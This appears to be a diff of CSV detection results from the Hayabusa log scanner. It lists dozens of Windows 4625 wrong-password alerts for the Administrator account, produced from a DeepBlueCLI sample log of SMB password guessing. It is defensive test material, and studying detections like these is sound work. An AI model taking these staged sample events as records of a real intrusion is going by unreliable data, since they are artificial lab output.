+2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
